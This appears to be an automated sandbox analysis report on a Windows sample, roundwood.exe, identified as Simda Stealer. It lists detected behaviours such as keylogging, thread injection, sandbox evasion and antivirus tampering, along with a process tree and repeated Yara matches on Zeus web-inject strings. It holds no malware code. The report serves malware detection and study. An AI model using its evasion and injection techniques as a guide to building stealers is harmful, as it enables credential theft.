Edit tour

Windows Analysis Report
roundwood.exe

Overview

General Information

Sample name:	roundwood.exe
Analysis ID:	1498164
MD5:	ce11c26163587185b09cb6720e4f0d76
SHA1:	c95a87fc31ee79b9f141fac18dd95f75d8f31fba
SHA256:	dc1c6d303002b580188a6d25d471d95d5a001186f85db279aca2e2de98527b92
Tags:	exeshiz
Infos:

Detection

Simda Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Detected unpacking (overwrites its own PE header)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Simda Stealer

AI detected suspicious sample

Allocates memory in foreign processes

Checks if browser processes are running

Contains VNC / remote desktop functionality (version string found)

Contains functionality to behave differently if execute on a Russian/Kazak computer

Contains functionality to capture and log keystrokes

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)

Contains functionality to infect the boot sector

Contains functionality to inject threads in other processes

Creates a thread in another existing process (thread injection)

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking mutex)

Found evasive API chain (may stop execution after checking volume information)

Found evasive API chain checking for user administrative privileges

Found stalling execution ending in API Sleep call

Injects a PE file into a foreign processes

Machine Learning detection for sample

Monitors registry run keys for changes

Moves itself to temp directory

Queries Google from non browser process on port 80

Queries random domain names (often used to prevent blacklisting and sinkholes)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to resolve many domain names, but no domain seems valid

Uses known network protocols on non-standard ports

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Connects to many different domains

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to create system tasks

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Entry point lies outside standard sections

Executes massive DNS lookups (> 100)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (might use process or thread times for sandbox detection)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Uncommon Svchost Parent Process

Tries to disable installed Antivirus / HIPS / PFW

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

roundwood.exe (PID: 5852 cmdline: "C:\Users\user\Desktop\roundwood.exe" MD5: CE11C26163587185B09CB6720E4F0D76)

svchost.exe (PID: 5284 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: B3CAC91D21D93F1989191CE7572B7F7E)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 4268 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 1576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 984 MD5: C31336C1EFC2CCB44B4326EA793040F2)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 4672 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 7260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 708 MD5: C31336C1EFC2CCB44B4326EA793040F2)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 6980 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 5528 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 976 MD5: C31336C1EFC2CCB44B4326EA793040F2)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 6300 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 5136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 744 MD5: C31336C1EFC2CCB44B4326EA793040F2)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 6648 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 5168 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 5616 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 2672 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 3436 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 4764 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 3656 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 4460 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 2212 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 2180 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

oOzTQCDSVNrWDmuGqzFbKRbZs.exe (PID: 4444 cmdline: "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

svchost.exe (PID: 7856 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 8156 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4268 -ip 4268 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 1860 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4672 -ip 4672 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 1888 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6980 -ip 6980 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6756 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6300 -ip 6300 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 3840 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6648 -ip 6648 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 8164 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5168 -ip 5168 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 3668 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5616 -ip 5616 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5348 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2672 -ip 2672 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6648 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3436 -ip 3436 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 3376 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4764 -ip 4764 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 356 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3656 -ip 3656 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5396 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4460 -ip 4460 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 3840 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2212 -ip 2212 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7352 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2180 -ip 2180 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 4068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2748593286.0000000000E70000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000017.00000002.2469299462.0000000002920000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000002.00000003.2418070085.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2471833561.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0000000F.00000002.2451003879.0000000000900000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
0000000C.00000002.2700298723.0000000001410000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000004.00000002.2719357526.00000000012E0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000019.00000002.2472684695.00000000008E0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000000.00000003.2027860859.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000000.00000003.2027860859.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4eb28:$a1: name=%s&port=%u 0x4e2c0:$a2: data_inject 0x4e4b0:$a3: keylog.txt 0x4e155:$a4: User-agent: %s]]] 0x4ec7c:$a5: %s\%02d.bmp
00000002.00000003.2500002475.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2499726055.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000005.00000002.2689381612.0000000000DD0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
0000001D.00000002.2479482654.0000000002D00000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000002.00000003.2048298647.0000000002970000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2508798151.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2482262641.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2499866560.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2487147831.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2392591021.0000000003C20000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000015.00000002.2460078038.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000002.00000003.2458081836.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2422680364.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2500272198.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0000001F.00000002.2486303903.0000000002410000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4fc10:$a1: name=%s&port=%u 0x4f3a8:$a2: data_inject 0x4f598:$a3: keylog.txt 0x4f23d:$a4: User-agent: %s]]] 0x4fd64:$a5: %s\%02d.bmp
00000005.00000002.2689429346.0000000000E30000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
0000001B.00000002.2475050431.00000000029F0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000002.00000003.2508679184.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000008.00000002.2747738831.0000000000C50000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000022.00000002.2487689003.0000000002950000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000002.00000003.2510071854.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000013.00000002.2455624289.0000000001450000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000002.00000003.2395495961.0000000003C20000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000015.00000002.2460508314.0000000002CD0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000002.00000003.2500141724.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
0000000C.00000002.2700342737.00000000014B0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000026.00000002.2502070915.0000000002760000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000022.00000002.2487542677.00000000027F0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000002.00000003.2510491693.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000004.00000002.2719273525.0000000001240000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
